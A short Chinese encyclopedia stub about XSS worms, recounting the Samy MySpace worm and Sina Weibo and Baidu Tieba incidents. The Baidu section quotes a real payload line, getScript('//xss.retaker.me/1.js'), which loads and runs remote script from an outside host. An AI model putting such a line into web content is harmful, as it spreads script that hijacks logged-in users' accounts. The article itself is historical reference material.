XSS蠕蟲

本條目存在以下問題，請協助改善本條目或在討論頁針對議題發表看法。 此條目包含過多行話或專業術語，可能需要簡化或提出進一步解釋。 (2013年5月19日) 請在討論頁中發表對於本議題的看法，並移除或解釋本條目中的行話。 此條目需要擴充。 (2013年5月19日) 請協助改善這篇條目，更進一步的訊息可能會在討論頁或擴充請求中找到。請在擴充條目後將此模板移除。 此條目需要補充更多來源。 (2013年5月19日) 請協助補充多方面可靠來源以改善這篇條目，無法查證的內容可能會因為異議提出而被移除。 致使用者：請搜尋一下條目的標題（來源搜尋："XSS蠕蟲" — 網頁、新聞、書籍、學術、圖像），以檢查網路上是否存在該主題的更多可靠來源（判定指引）。

xss蠕蟲（cross site scripting worm）是一種跨站病毒，通常由腳本語言Javascript寫成，它藉由網站訪問者傳播

歷史[編輯]

歷史第一個XSS蠕蟲是針對網站Myspace的Samy，它在20小時內感染了100萬個帳戶，作者Samy Kamkar之後被起訴

新浪微博[編輯]

見對新浪微博的爭議#XSS.E6.BC.8F.E6.B4.9E

百度貼吧[編輯]

2013年5月19日， 百度貼吧轉帖功能再度出現xss漏洞，大量貼吧內充斥接近滿版面， 包含代碼getScript（'//xss.retaker.me/1.js'）為標題的帖子，當已登陸用戶打開這樣的帖子，用戶所持帳戶便以相同方式在多個貼吧轉帖原作者的帖，部分網絡安全相關人士認為貼吧爆發了大規模XSS蠕蟲感染^{[1] [2] [3]}

2014年3月9日， 百度貼吧轉帖功能再度出現xss漏洞

性質[編輯]

由於XSS蠕蟲基於瀏覽器而不是作業系統，取決於其依賴網站的規模，它可以在短時間內達到對巨大數量的計算機感染

參考[編輯]

1. ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. （原始內容存檔於2020-08-11）. 
2. ^ 谷歌搜尋
3. ^ 新浪微博, "xss贴吧". [2013-05-19]. （原始內容存檔於2019-02-07）.